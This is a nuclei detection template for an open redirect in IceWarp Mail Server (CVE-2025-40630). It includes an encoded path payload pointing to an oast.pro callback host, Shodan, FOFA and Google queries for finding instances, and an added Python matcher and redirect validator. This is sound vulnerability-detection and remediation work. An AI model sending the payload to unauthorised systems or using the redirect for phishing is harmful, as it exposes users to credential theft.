Vulnerability description
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
id: CVE-2025-40630

info:
  name: IceWarp Mail Server ≤11.4.0 - Open Redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
  impact: |
    An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft.
  remediation: |
    Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40630
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-40630
    cwe-id: CWE-601
    epss-score: 0.00399
    epss-percentile: 0.59934
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query: 'http.title:"IceWarp"'
    fofa-query: 'title="IceWarp"'
    google-query: intitle:"icewarp"
  tags: cve,cve2025,icewarp,redirect,open-redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2f%5c%2foast.pro%2f.."

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'

      - type: status
        status:
          - 302
# digest: 490a00463044022061b8bfd19f7f484d5b46b7a56bcaf7863f4a3fab186e9963bf827cc74d01208602206182d8094c15e38bae4347961179708d2ea30523e0a8f44577f24ad4c3db1005:922c64590222798bb761d5b6d8e72950
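Two things a practitioner usually wants next to a template like this, written here as an added Python example that is not part of the template and not IceWarp's code: the template's own decision logic (the `Location` header regex combined with a 302 status under `matchers-condition: and`) reproduced and run over constructed HTTP responses, and a server-side redirect validator of the kind the remediation text asks for, which rejects the `//host` and `/\host` shapes the `%2f%5c%2f` probe depends on. The sample responses, the `/webmail/` path and all function names are assumptions; the page does not record the exact `Location` value a vulnerable IceWarp instance returns, so the constructed vulnerable response simply points at the callback host.

```python
# Added example: not part of the nuclei template above or of IceWarp.
# Part 1 reproduces the template's matcher logic over constructed HTTP
# responses; part 2 is a redirect validator of the kind the remediation
# text calls for. Hostnames, paths and responses are constructed sample data.
import re
from urllib.parse import unquote, urlsplit

# Regex copied verbatim from the template's header matcher: a Location
# header whose host ends in the interactsh callback domain oast.pro.
LOCATION_RE = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
)

# Constructed responses (the page does not record IceWarp's exact Location
# value; the vulnerable one simply sends the browser to the callback host).
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: IceWarp\r\n"
    b"Location: https://oast.pro/\r\n"
    b"Content-Length: 0\r\n\r\n"
)
PATCHED_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /webmail/\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# Mentions the host in a header but is not a redirect: must NOT match,
# because matchers-condition: and also requires status 302.
REFLECTED_200 = (
    b"HTTP/1.1 200 OK\r\n"
    b"Location: https://oast.pro/\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status_code, header_block)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    return status, "\n".join(lines[1:])


def template_matches(raw: bytes) -> bool:
    """Same decision the template makes: header regex AND status 302."""
    status, headers = parse_response(raw)
    return status == 302 and LOCATION_RE.search(headers) is not None


def _fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %252f-style double encoding cannot
    hide a slash from the checks below."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def is_safe_redirect_target(target: str) -> bool:
    """Accept only a same-origin absolute path such as /webmail/login.

    Rejects absolute URLs, protocol-relative //host, and the /\\host form
    (browsers parse a backslash as a slash in http(s) URLs, so /\\/oast.pro
    is loaded as //oast.pro, which is what the %5c in the probe relies on),
    including percent-encoded variants. Illustrative; not IceWarp's fix.
    """
    decoded = _fully_decode(target)
    if any(c in decoded for c in "\r\n\0"):
        return False  # header splitting / truncation attempts
    normalized = decoded.replace("\\", "/")
    if not normalized.startswith("/") or normalized.startswith("//"):
        return False  # relative, scheme-bearing, or protocol-relative
    parts = urlsplit(normalized)
    return not parts.scheme and not parts.netloc


def safe_redirect(target: str, fallback: str = "/") -> str:
    """Return target if it passes validation, otherwise the fallback."""
    return target if is_safe_redirect_target(target) else fallback


if __name__ == "__main__":
    for name, resp in [("vulnerable", VULNERABLE_RESPONSE),
                       ("patched", PATCHED_RESPONSE),
                       ("reflected-200", REFLECTED_200)]:
        print(f"{name:14s} template match: {template_matches(resp)}")
    for t in ["/webmail/login", "/%2f%5c%2foast.pro%2f..", "//oast.pro",
              "https://oast.pro/", "/%252f%255c%252foast.pro"]:
        print(f"{t!r:32s} -> {safe_redirect(t)}")
```

The validator deliberately decodes before normalizing backslashes: a naive check for a leading `//` on the raw path passes `/%2f%5c%2f...`, and a check that decodes once still passes the double-encoded variant, which is why the probe uses `%5c` rather than a plain second slash.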